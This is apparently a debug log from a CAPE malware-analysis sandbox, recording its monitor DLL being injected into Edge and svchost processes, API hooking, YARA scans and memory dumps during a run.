2026-05-28 19:26:14,494 [root] DEBUG: 4192: DLL loaded at 0x00007FFE72DB0000: C:\Windows\system32\rsaenh (0x34000 bytes).
2026-05-28 19:26:14,506 [root] DEBUG: 4712: ProcessImageBase: Main module image at 0x00007FF7DD790000 unmodified (entropy change 2.623369e-06)
2026-05-28 19:26:14,522 [root] DEBUG: 4192: DLL loaded at 0x00007FFE5C080000: C:\Windows\System32\MicrosoftAccountWAMExtension (0x8c000 bytes).
2026-05-28 19:26:15,699 [root] DEBUG: 4192: DLL loaded at 0x00007FFE5C110000: C:\Windows\System32\ShellCommonCommonProxyStub (0xe4000 bytes).
2026-05-28 19:26:16,075 [root] DEBUG: 4192: DLL loaded at 0x00007FFE72E40000: C:\Windows\SYSTEM32\msvcp110_win (0x8a000 bytes).
2026-05-28 19:26:16,076 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6E1D0000: C:\Windows\SYSTEM32\policymanager (0xa1000 bytes).
2026-05-28 19:26:16,127 [root] DEBUG: 4192: DLL loaded at 0x00007FFE5F4C0000: C:\Windows\system32\explorerframe (0x244000 bytes).
2026-05-28 19:26:16,137 [root] DEBUG: 4192: DLL loaded at 0x00007FFE752D0000: C:\Windows\System32\SETUPAPI (0x46e000 bytes).
2026-05-28 19:26:16,148 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6E980000: C:\Windows\System32\netprofm (0x3f000 bytes).
2026-05-28 19:26:16,163 [root] DEBUG: 4192: CreateProcessHandler: Injection info set for new process 8480: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ImageBase: 0x00007FF6D90F0000
2026-05-28 19:26:16,178 [root] DEBUG: 4192: CreateProcessHandler: Injection info set for new process 8496: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ImageBase: 0x00007FF6D90F0000
2026-05-28 19:26:16,179 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 8480
2026-05-28 19:26:16,182 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 8496
2026-05-28 19:26:16,184 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 8480
2026-05-28 19:26:16,186 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 8496
2026-05-28 19:26:16,191 [root] DEBUG: 4192: DLL loaded at 0x00007FFE1C3E0000: C:\Program Files (x86)\Microsoft\Edge\Application\148.0.3967.83\telclient (0x3ed000 bytes).
2026-05-28 19:26:16,220 [root] DEBUG: 4192: DLL loaded at 0x00007FFE1EE20000: C:\Program Files (x86)\Microsoft\Edge\Application\148.0.3967.83\ffmpeg (0x467000 bytes).
2026-05-28 19:26:16,221 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6C120000: C:\Windows\System32\npmproxy (0x10000 bytes).
2026-05-28 19:26:16,222 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73AD0000: C:\Windows\SYSTEM32\DEVOBJ (0x33000 bytes).
2026-05-28 19:26:16,223 [root] DEBUG: 4192: DLL loaded at 0x00007FFE63F90000: C:\Windows\System32\Windows.FileExplorer.Common (0x61000 bytes).
2026-05-28 19:26:16,226 [root] DEBUG: 4192: DLL loaded at 0x00007FFE1BD80000: C:\Program Files (x86)\Microsoft\Edge\Application\148.0.3967.83\oneds (0x33f000 bytes).
2026-05-28 19:26:16,231 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73F00000: C:\Windows\System32\WINTRUST (0x67000 bytes).
2026-05-28 19:26:16,231 [root] DEBUG: 4712: DLL loaded at 0x00007FFE67E00000: C:\Windows\system32\twext (0x33000 bytes).
2026-05-28 19:26:16,232 [root] DEBUG: 4192: DLL loaded at 0x00007FFE729D0000: C:\Windows\System32\FirewallAPI (0x96000 bytes).
2026-05-28 19:26:16,233 [root] DEBUG: 4192: DLL loaded at 0x00007FFE72990000: C:\Windows\System32\fwbase (0x36000 bytes).
2026-05-28 19:26:16,235 [root] DEBUG: 4192: DLL loaded at 0x00007FFE764D0000: C:\Windows\System32\coml2 (0x79000 bytes).
2026-05-28 19:26:16,241 [root] DEBUG: 4192: DLL loaded at 0x00007FFE61140000: C:\Windows\system32\TenantRestrictionsPlugin (0x1b000 bytes).
2026-05-28 19:26:16,245 [root] DEBUG: 4192: CreateProcessHandler: Injection info set for new process 8644: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ImageBase: 0x00007FF6D90F0000
2026-05-28 19:26:16,246 [root] DEBUG: 4192: DLL loaded at 0x00007FFE5BF00000: C:\Program Files (x86)\Microsoft\Edge\Application\148.0.3967.83\microsoft_shell_integration (0x78000 bytes).
2026-05-28 19:26:16,249 [root] DEBUG: 4192: CreateProcessHandler: Injection info set for new process 8672: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ImageBase: 0x00007FF6D90F0000
2026-05-28 19:26:16,250 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 8644
2026-05-28 19:26:16,251 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 8672
2026-05-28 19:26:16,255 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 8672
2026-05-28 19:26:16,256 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 8644
2026-05-28 19:26:16,272 [root] DEBUG: 4192: DLL loaded at 0x00007FFE719D0000: C:\Windows\System32\RMCLIENT (0x2a000 bytes).
2026-05-28 19:26:16,277 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6F8F0000: C:\Windows\System32\XmlLite (0x36000 bytes).
2026-05-28 19:26:16,279 [root] DEBUG: 4192: DLL loaded at 0x00007FFE5F360000: C:\Windows\System32\wpnapps (0x15b000 bytes).
2026-05-28 19:26:16,280 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6E390000: C:\Windows\SYSTEM32\WindowsCodecs (0x1b4000 bytes).
2026-05-28 19:26:16,285 [lib.api.process] INFO: Monitor config for process 4712: C:\c6kogbu7\dll\4712.ini
2026-05-28 19:26:16,287 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:16,288 [root] DEBUG: 4192: CreateProcessHandler: Injection info set for new process 8812: C:\Program Files (x86)\Microsoft\Edge\Application\148.0.3967.83\identity_helper.exe, ImageBase: 0x00007FF7C2580000
2026-05-28 19:26:16,289 [root] DEBUG: 4192: DLL loaded at 0x00007FFE605C0000: C:\Windows\System32\thumbcache (0x66000 bytes).
2026-05-28 19:26:16,290 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:16,291 [root] INFO: Announced 64-bit process name: identity_helper.exe pid: 8812
2026-05-28 19:26:16,294 [lib.api.process] INFO: Monitor config for process 8812: C:\c6kogbu7\dll\8812.ini
2026-05-28 19:26:16,295 [root] DEBUG: 4192: DLL loaded at 0x00007FFE72E40000: C:\Windows\SYSTEM32\msvcp110_win (0x8a000 bytes).
2026-05-28 19:26:16,296 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6E1D0000: C:\Windows\SYSTEM32\policymanager (0xa1000 bytes).
2026-05-28 19:26:16,296 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:16,300 [root] DEBUG: Loader: Injecting process 4712 with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:16,301 [root] DEBUG: 4712: caller_dispatch: Added region at 0x00000000078E0000 to tracked regions list (ntdll::LdrLoadDll returns to 0x00000000078E0044, thread 8872).
2026-05-28 19:26:16,302 [root] DEBUG: 4712: DumpPEsInRange: Scanning range 0x00000000078E0000 - 0x00000000078E0135.
2026-05-28 19:26:16,303 [root] DEBUG: 4712: ScanForDisguisedPE: Size too small: 0x135 bytes
2026-05-28 19:26:16,308 [lib.common.results] INFO: Uploading file C:\IlgkUEVfG\CAPE\4712_1242316262328452026 to CAPE\cfaadd5121464938e39e8cb63e7f64f962a5753dfd7459ae3071af060a4c60e6; Size is 309; Max size: 100000000
2026-05-28 19:26:16,313 [root] DEBUG: 4712: DumpMemory: Payload successfully created: C:\IlgkUEVfG\CAPE\4712_1242316262328452026 (size 309 bytes)
2026-05-28 19:26:16,314 [root] DEBUG: 4712: DumpRegion: Dumped entire allocation from 0x00000000078E0000, size 4096 bytes.
2026-05-28 19:26:16,315 [root] DEBUG: 4712: ProcessTrackedRegion: Dumped region at 0x00000000078E0000.
2026-05-28 19:26:16,315 [root] DEBUG: 4712: YaraScan: Scanning 0x00000000078E0000, size 0x135
2026-05-28 19:26:16,316 [root] DEBUG: 4712: Monitor config - unrecognised key host-ip.
2026-05-28 19:26:16,316 [root] DEBUG: 4712: Monitor config - unrecognised key host-port.
2026-05-28 19:26:16,317 [root] DEBUG: 4712: Python path set to 'C:\Users\admin\AppData\Local\Python\pythoncore-3.14-64'.
2026-05-28 19:26:16,317 [root] DEBUG: 4712: Dropped file limit defaulting to 100.
2026-05-28 19:26:16,340 [root] DEBUG: 4712: hook_api: LdrpCallInitRoutine export address 0x00007FFE766E99BC obtained via GetFunctionAddress
2026-05-28 19:26:16,391 [root] WARNING: b'Unable to create trampoline for LockResource, hook type 2'
2026-05-28 19:26:16,392 [root] DEBUG: 4712: set_hooks: Unable to hook LockResource
2026-05-28 19:26:16,434 [root] DEBUG: 4712: Hooked 627 out of 628 functions
2026-05-28 19:26:16,437 [root] DEBUG: 4712: DLL loaded at 0x00007FFE5ADA0000: C:\Windows\System32\windows.internal.shell.broker (0xdd000 bytes).
2026-05-28 19:26:16,438 [root] DEBUG: 4712: DLL loaded at 0x00007FFE5ADA0000: C:\Windows\System32\windows.internal.shell.broker (0xdd000 bytes).
2026-05-28 19:26:16,439 [root] DEBUG: 4712: OpenProcessHandler: Injection info created for process 4192, handle 0x25dc: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
2026-05-28 19:26:16,471 [root] INFO: Loaded monitor into process with pid 4712
2026-05-28 19:26:16,479 [root] DEBUG: Error 317 (0x13d) - InjectDllViaThread: RtlCreateUserThread injection failed: The system cannot find message text for message number 0x%1 in the message file for %2.
2026-05-28 19:26:16,479 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:16,945 [lib.api.process] INFO: Potential dll side-loading detected in local directory: onnxruntime.dll
2026-05-28 19:26:16,946 [lib.api.process] INFO: Potential dll side-loading detected in local directory: d3dcompiler_47.dll
2026-05-28 19:26:16,949 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:16,954 [root] DEBUG: Loader: Injecting process 8812 (thread 8816) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:16,954 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:16,955 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:16,956 [lib.api.process] INFO: Injected into 64-bit <Process 8812 identity_helper.exe>
2026-05-28 19:26:17,021 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6C2A0000: C:\Windows\SYSTEM32\capauthz (0x51000 bytes).
2026-05-28 19:26:17,043 [root] DEBUG: 4192: DLL loaded at 0x00007FFE68280000: C:\Windows\SYSTEM32\windows.staterepositorycore (0x11000 bytes).
2026-05-28 19:26:17,048 [root] DEBUG: 4192: CreateProcessHandler: Injection info set for new process 9024: C:\Program Files (x86)\Microsoft\Edge\Application\148.0.3967.83\identity_helper.exe, ImageBase: 0x00007FF7C2580000
2026-05-28 19:26:17,051 [root] INFO: Announced 64-bit process name: identity_helper.exe pid: 9024
2026-05-28 19:26:17,053 [lib.api.process] INFO: Monitor config for process 9024: C:\c6kogbu7\dll\9024.ini
2026-05-28 19:26:17,057 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:17,139 [lib.api.process] INFO: Potential dll side-loading detected in local directory: onnxruntime.dll
2026-05-28 19:26:17,139 [lib.api.process] INFO: Potential dll side-loading detected in local directory: d3dcompiler_47.dll
2026-05-28 19:26:17,141 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:17,147 [root] DEBUG: Loader: Injecting process 9024 (thread 9028) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:17,148 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:17,148 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:17,149 [lib.api.process] INFO: Injected into 64-bit <Process 9024 identity_helper.exe>
2026-05-28 19:26:17,151 [root] INFO: Announced 64-bit process name: identity_helper.exe pid: 9024
2026-05-28 19:26:17,151 [lib.api.process] INFO: Monitor config for process 9024: C:\c6kogbu7\dll\9024.ini
2026-05-28 19:26:17,151 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:17,294 [lib.api.process] INFO: Potential dll side-loading detected in local directory: onnxruntime.dll
2026-05-28 19:26:17,295 [lib.api.process] INFO: Potential dll side-loading detected in local directory: d3dcompiler_47.dll
2026-05-28 19:26:17,298 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:17,302 [root] DEBUG: Loader: Injecting process 9024 (thread 9028) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:17,303 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2026-05-28 19:26:17,304 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:17,306 [lib.api.process] INFO: Injected into 64-bit <Process 9024 identity_helper.exe>
2026-05-28 19:26:17,441 [root] DEBUG: 9024: Python path set to 'C:\Users\admin\AppData\Local\Python\pythoncore-3.14-64'.
2026-05-28 19:26:17,445 [root] DEBUG: 9024: Interactive desktop enabled.
2026-05-28 19:26:17,447 [root] DEBUG: 9024: Dropped file limit defaulting to 100.
2026-05-28 19:26:17,525 [root] DEBUG: 9024: Disabling sleep skipping.
2026-05-28 19:26:17,531 [root] DEBUG: 9024: YaraInit: Compiled rules loaded from existing file C:\c6kogbu7\data\yara\capemon.yac
2026-05-28 19:26:17,555 [root] DEBUG: 9024: RtlInsertInvertedFunctionTable 0x00007FFE766E090E, LdrpInvertedFunctionTableSRWLock 0x00007FFE7683D4F0
2026-05-28 19:26:17,556 [root] DEBUG: 9024: YaraScan: Scanning 0x00007FF7C2580000, size 0x28b4d8
2026-05-28 19:26:17,984 [root] DEBUG: 9024: Monitor initialised: 64-bit capemon loaded in process 9024 at 0x00007FFE34DD0000, thread 9028, image base 0x00007FF7C2580000, stack from 0x000000BFC20F4000-0x000000BFC2100000
2026-05-28 19:26:17,987 [root] DEBUG: 9024: Commandline: "C:\Program Files (x86)\Microsoft\Edge\Application\148.0.3967.83\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=windows_package_identity --skip-read-main-dll --metrics-shmem-handle=6464,i,17274754723001405329,2064800488299496148,524288 --field-trial-handle=2308,i,5235836207557685522,18313491843917805100,262144 --variations-seed-version --pseudonymization-salt-handle=2348,i,3070062779459571283,35693304584099400
2026-05-28 19:26:17,990 [root] DEBUG: 9024: add_all_dlls_to_dll_ranges: skipping C:\Program Files (x86)\Microsoft\Edge\Application\148.0.3967.83\msedge_elf.dll
2026-05-28 19:26:18,020 [root] DEBUG: 9024: hook_api: LdrpCallInitRoutine export address 0x00007FFE766E99BC obtained via GetFunctionAddress
2026-05-28 19:26:18,044 [root] WARNING: b'Unable to create trampoline for LockResource, hook type 2'
2026-05-28 19:26:18,044 [root] DEBUG: 9024: set_hooks: Unable to hook LockResource
2026-05-28 19:26:18,050 [root] DEBUG: 9024: Hooked 627 out of 628 functions
2026-05-28 19:26:18,065 [root] DEBUG: 9024: Syscall hook installed, syscall logging level 1
2026-05-28 19:26:18,070 [root] DEBUG: 9024: RestoreHeaders: Restored original import table.
2026-05-28 19:26:18,070 [root] INFO: Loaded monitor into process with pid 9024
2026-05-28 19:26:18,071 [root] DEBUG: 9024: YaraScan: Scanning 0x00007FFE342B0000, size 0x4b9994
2026-05-28 19:26:18,663 [root] DEBUG: 4712: OpenProcessHandler: Image base for process 4192 (handle 0x1114): 0x00007FF6D90F0000.
2026-05-28 19:26:18,762 [root] DEBUG: Error 5 (0x5) - OpenProcessHandler: Error obtaining target process name: Access is denied.
2026-05-28 19:26:18,771 [root] DEBUG: 4712: OpenProcessHandler: Injection info created for process 2328, handle 0x1144: Error obtaining target process name
2026-05-28 19:26:18,773 [root] DEBUG: Error 5 (0x5) - OpenProcessHandler: Error obtaining target process name: Access is denied.
2026-05-28 19:26:18,775 [root] DEBUG: 4712: OpenProcessHandler: Injection info created for process 5396, handle 0x10e4: Error obtaining target process name
2026-05-28 19:26:18,777 [root] DEBUG: Error 5 (0x5) - OpenProcessHandler: Error obtaining target process name: Access is denied.
2026-05-28 19:26:18,780 [root] DEBUG: 4712: OpenProcessHandler: Injection info created for process 5612, handle 0x10e8: Error obtaining target process name
2026-05-28 19:26:18,781 [root] DEBUG: Error 5 (0x5) - OpenProcessHandler: Error obtaining target process name: Access is denied.
2026-05-28 19:26:18,782 [root] DEBUG: 4712: OpenProcessHandler: Injection info created for process 5336, handle 0xd9c: Error obtaining target process name
2026-05-28 19:26:18,788 [root] DEBUG: Error 5 (0x5) - OpenProcessHandler: Error obtaining target process name: Access is denied.
2026-05-28 19:26:18,789 [root] DEBUG: 4712: OpenProcessHandler: Injection info created for process 7024, handle 0xbc0: Error obtaining target process name
2026-05-28 19:26:18,878 [root] DEBUG: 4712: DLL loaded at 0x00007FFE59540000: C:\Windows\SYSTEM32\MsftEdit (0x34d000 bytes).
2026-05-28 19:26:18,879 [root] DEBUG: 4712: DLL loaded at 0x00007FFE59540000: C:\Windows\SYSTEM32\MsftEdit (0x34d000 bytes).
2026-05-28 19:26:19,056 [root] DEBUG: 4712: DLL loaded at 0x00007FFE5BE50000: C:\Program Files\Common Files\microsoft shared\ink\tiptsf (0xa9000 bytes).
2026-05-28 19:26:19,057 [root] DEBUG: 4712: DLL loaded at 0x00007FFE5BE50000: C:\Program Files\Common Files\microsoft shared\ink\tiptsf (0xa9000 bytes).
2026-05-28 19:26:19,081 [root] DEBUG: 9024: Yara error: Scanning timed out
2026-05-28 19:26:19,082 [root] DEBUG: 9024: YaraScan: Scanning 0x00007FFE342B0000, size 0x4b9994
2026-05-28 19:26:19,115 [root] DEBUG: 4712: DLL loaded at 0x00007FFE1B990000: C:\Windows\system32\UIRibbon (0x3ec000 bytes).
2026-05-28 19:26:19,116 [root] DEBUG: 4712: DLL loaded at 0x00007FFE1B990000: C:\Windows\system32\UIRibbon (0x3ec000 bytes).
2026-05-28 19:26:19,352 [lib.api.process] INFO: Monitor config for process 836: C:\c6kogbu7\dll\836.ini
2026-05-28 19:26:19,354 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:19,356 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:19,362 [root] DEBUG: Loader: Injecting process 836 with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:19,364 [root] DEBUG: 836: Python path set to 'C:\Users\admin\AppData\Local\Python\pythoncore-3.14-64'.
2026-05-28 19:26:19,365 [root] DEBUG: 836: Disabling sleep skipping.
2026-05-28 19:26:19,365 [root] DEBUG: 836: Interactive desktop enabled.
2026-05-28 19:26:19,366 [root] DEBUG: 836: Dropped file limit defaulting to 100.
2026-05-28 19:26:19,378 [root] DEBUG: 836: Services hook set enabled
2026-05-28 19:26:19,381 [root] DEBUG: 836: YaraInit: Compiled rules loaded from existing file C:\c6kogbu7\data\yara\capemon.yac
2026-05-28 19:26:19,394 [root] DEBUG: 836: RtlInsertInvertedFunctionTable 0x00007FFE766E090E, LdrpInvertedFunctionTableSRWLock 0x00007FFE7683D4F0
2026-05-28 19:26:19,394 [root] DEBUG: 836: Monitor initialised: 64-bit capemon loaded in process 836 at 0x00007FFE34DD0000, thread 9096, image base 0x00007FF7BE050000, stack from 0x000000D9C50F4000-0x000000D9C5100000
2026-05-28 19:26:19,395 [root] DEBUG: 836: Commandline: C:\Windows\system32\svchost.exe -k DcomLaunch -p
2026-05-28 19:26:19,407 [root] DEBUG: 836: Hooked 69 out of 69 functions
2026-05-28 19:26:19,408 [root] INFO: Loaded monitor into process with pid 836
2026-05-28 19:26:19,409 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2026-05-28 19:26:19,409 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:19,410 [lib.api.process] INFO: Injected into 64-bit <Process 836 svchost.exe>
2026-05-28 19:26:20,001 [root] DEBUG: 9024: YaraScan: Scanning 0x00007FFE342B0000, size 0x4b9994
2026-05-28 19:26:20,014 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6BAA0000: C:\Windows\system32\wlanapi (0x74000 bytes).
2026-05-28 19:26:20,028 [root] DEBUG: 9024: YaraScan: Scanning 0x00007FFE342B0000, size 0x4b9994
2026-05-28 19:26:20,044 [root] DEBUG: 4192: DLL loaded at 0x00007FFE626E0000: C:\Windows\System32\Windows.ApplicationModel (0xe9000 bytes).
2026-05-28 19:26:20,045 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6C5B0000: C:\Windows\System32\AppXDeploymentClient (0x102000 bytes).
2026-05-28 19:26:20,056 [root] DEBUG: 9024: YaraScan: Scanning 0x00007FFE342B0000, size 0x4b9994
2026-05-28 19:26:20,069 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73790000: C:\Windows\SYSTEM32\ncrypt (0x27000 bytes).
2026-05-28 19:26:20,069 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73750000: C:\Windows\SYSTEM32\NTASN1 (0x3b000 bytes).
2026-05-28 19:26:20,070 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6BF00000: C:\Windows\system32\PCPKsp (0x118000 bytes).
2026-05-28 19:26:20,071 [root] DEBUG: 4192: DLL loaded at 0x00007FFE752B0000: C:\Windows\System32\imagehlp (0x1d000 bytes).
2026-05-28 19:26:20,071 [root] DEBUG: 4192: DLL loaded at 0x00007FFE6C350000: C:\Windows\SYSTEM32\tbs (0x1b000 bytes).
2026-05-28 19:26:20,072 [root] DEBUG: 4192: DLL loaded at 0x00007FFE60FF0000: C:\Windows\system32\ncryptprov (0x5a000 bytes).
2026-05-28 19:26:20,083 [root] DEBUG: 9024: YaraScan: Scanning 0x00007FFE342B0000, size 0x4b9994
2026-05-28 19:26:20,109 [root] DEBUG: 9024: YaraScan: Scanning 0x00007FFE342B0000, size 0x4b9994
2026-05-28 19:26:20,116 [root] DEBUG: 4192: DLL loaded at 0x00007FFE600F0000: C:\Windows\SYSTEM32\NETAPI32 (0x19000 bytes).
2026-05-28 19:26:20,137 [root] DEBUG: 9024: caller_dispatch: Added region at 0x00007FFE342B0000 to tracked regions list (ntdll::NtProtectVirtualMemory returns to 0x00007FFE344AF156, thread 9028).
2026-05-28 19:26:20,138 [root] DEBUG: 9024: caller_dispatch: Scanning calling region at 0x00007FFE342B0000...
2026-05-28 19:26:20,147 [root] DEBUG: 9024: ProcessTrackedRegion: Region at 0x00007FFE342B0000 mapped as \Device\HarddiskVolume2\Program Files (x86)\Microsoft\Edge\Application\148.0.3967.83\msedge_elf.dll appears unmodified, skipping
2026-05-28 19:26:20,150 [root] DEBUG: 9024: DLL loaded at 0x00007FFE743A0000: C:\Windows\System32\bcryptprimitives (0x82000 bytes).
2026-05-28 19:26:20,174 [root] DEBUG: 9024: YaraScan: Scanning 0x00007FF7C2580000, size 0x28b4d8
2026-05-28 19:26:20,190 [root] DEBUG: 9024: YaraScan: Scanning 0x00007FF7C2580000, size 0x28b4d8
2026-05-28 19:26:20,205 [root] DEBUG: 9024: YaraScan: Scanning 0x00007FF7C2580000, size 0x28b4d8
2026-05-28 19:26:20,222 [root] DEBUG: 9024: YaraScan: Scanning 0x00007FF7C2580000, size 0x28b4d8
2026-05-28 19:26:20,237 [root] DEBUG: 9024: YaraScan: Scanning 0x00007FF7C2580000, size 0x28b4d8
2026-05-28 19:26:20,252 [root] DEBUG: 9024: YaraScan: Scanning 0x00007FF7C2580000, size 0x28b4d8
2026-05-28 19:26:20,273 [root] DEBUG: 9024: caller_dispatch: Added region at 0x00007FF7C2580000 to tracked regions list (ntdll::NtProtectVirtualMemory returns to 0x00007FF7C2674096, thread 9028).
2026-05-28 19:26:20,274 [root] DEBUG: 9024: YaraScan: Scanning 0x00007FF7C2580000, size 0x28b4d8
2026-05-28 19:26:20,290 [root] DEBUG: 9024: ProcessImageBase: Main module image at 0x00007FF7C2580000 unmodified (entropy change 0.000000e+00)
2026-05-28 19:26:20,293 [root] DEBUG: 9024: DLL loaded at 0x00007FFE751C0000: C:\Windows\System32\shcore (0xad000 bytes).
2026-05-28 19:26:20,317 [root] DEBUG: 9024: DLL loaded at 0x000001E0A9000000: C:\Program Files (x86)\Microsoft\Edge\Application\148.0.3967.83\msedge (0x136be000 bytes).
2026-05-28 19:26:20,320 [root] DEBUG: 9024: DLL loaded at 0x00007FFE71770000: C:\Windows\system32\uxtheme (0x9e000 bytes).
2026-05-28 19:26:20,321 [root] DEBUG: 4192: DLL loaded at 0x00007FFE73480000: C:\Windows\system32\mswsock (0x6a000 bytes).
2026-05-28 19:26:20,324 [root] DEBUG: 9024: DLL loaded at 0x00007FFE75A80000: C:\Windows\System32\MSCTF (0x114000 bytes).
2026-05-28 19:26:20,325 [root] DEBUG: 4712: OpenProcessHandler: Injection info created for process 9024, handle 0xb7c: C:\Program Files (x86)\Microsoft\Edge\Application\148.0.3967.83\identity_helper.exe
2026-05-28 19:26:20,354 [root] DEBUG: 9024: DLL loaded at 0x00007FFE71C90000: C:\Windows\SYSTEM32\kernel.appcore (0x12000 bytes).
2026-05-28 19:26:20,643 [root] DEBUG: 9024: DLL loaded at 0x00007FFE76420000: C:\Windows\System32\clbcatq (0xa9000 bytes).
2026-05-28 19:26:20,655 [root] DEBUG: 9024: DLL loaded at 0x00007FFE751C0000: C:\Windows\System32\shcore (0xad000 bytes).
2026-05-28 19:26:20,656 [root] DEBUG: 9024: DLL loaded at 0x00007FFE6F930000: C:\Windows\System32\PROPSYS (0xf6000 bytes).
2026-05-28 19:26:20,656 [root] DEBUG: 9024: DLL loaded at 0x00007FFE71170000: C:\Windows\System32\CoreMessaging (0xf2000 bytes).
2026-05-28 19:26:20,657 [root] DEBUG: 9024: DLL loaded at 0x00007FFE62A90000: C:\Windows\System32\execmodelclient (0x63000 bytes).
2026-05-28 19:26:20,666 [root] DEBUG: 9024: DLL loaded at 0x00007FFE6E670000: C:\Windows\System32\twinapi.appcore (0x203000 bytes).
2026-05-28 19:26:20,668 [root] DEBUG: 9024: DLL loaded at 0x00007FFE70740000: C:\Windows\SYSTEM32\wintypes (0x155000 bytes).
2026-05-28 19:26:20,668 [root] DEBUG: 9024: DLL loaded at 0x00007FFE719D0000: C:\Windows\System32\RMCLIENT (0x2a000 bytes).
2026-05-28 19:26:20,669 [root] DEBUG: 9024: DLL loaded at 0x00007FFE6F8F0000: C:\Windows\System32\XmlLite (0x36000 bytes).
2026-05-28 19:26:20,669 [root] DEBUG: 9024: DLL loaded at 0x00007FFE5F360000: C:\Windows\System32\wpnapps (0x15b000 bytes).
2026-05-28 19:26:20,678 [root] DEBUG: 9024: DLL loaded at 0x00007FFE64F60000: C:\Windows\System32\OneCoreCommonProxyStub (0x7f000 bytes).
2026-05-28 19:26:20,687 [root] DEBUG: 9024: DLL loaded at 0x00007FFE61280000: C:\Windows\system32\execmodelproxy (0x18000 bytes).
2026-05-28 19:26:20,690 [root] DEBUG: 9024: DLL loaded at 0x00007FFE6EF30000: C:\Windows\SYSTEM32\usermgrcli (0x16000 bytes).
2026-05-28 19:26:20,703 [root] DEBUG: 9024: DLL loaded at 0x00007FFE72E40000: C:\Windows\System32\msvcp110_win (0x8a000 bytes).
2026-05-28 19:26:20,705 [root] DEBUG: 9024: DLL loaded at 0x00007FFE6E1D0000: C:\Windows\SYSTEM32\policymanager (0xa1000 bytes).
2026-05-28 19:26:20,709 [root] DEBUG: 9024: DLL loaded at 0x00007FFE6CDC0000: C:\Windows\System32\OneCoreUAPCommonProxyStub (0x7d0000 bytes).
2026-05-28 19:26:20,714 [root] DEBUG: 4712: OpenProcessHandler: Image base for process 7024 (handle 0xd94): 0x00007FF6CF3E0000.
2026-05-28 19:26:20,769 [root] DEBUG: 9024: DLL loaded at 0x00007FFE696D0000: C:\Windows\System32\Windows.StateRepositoryPS (0x146000 bytes).
2026-05-28 19:26:20,814 [root] DEBUG: 9024: DLL loaded at 0x00007FFE73F00000: C:\Windows\System32\WINTRUST (0x67000 bytes).
2026-05-28 19:26:20,815 [root] DEBUG: 9024: DLL loaded at 0x00007FFE6C2A0000: C:\Windows\SYSTEM32\capauthz (0x51000 bytes).
2026-05-28 19:26:20,837 [root] DEBUG: 9024: DLL loaded at 0x00007FFE738B0000: C:\Windows\System32\MSASN1 (0x12000 bytes).
2026-05-28 19:26:20,896 [root] DEBUG: 9024: DLL loaded at 0x00007FFE626E0000: C:\Windows\System32\Windows.ApplicationModel (0xe9000 bytes).
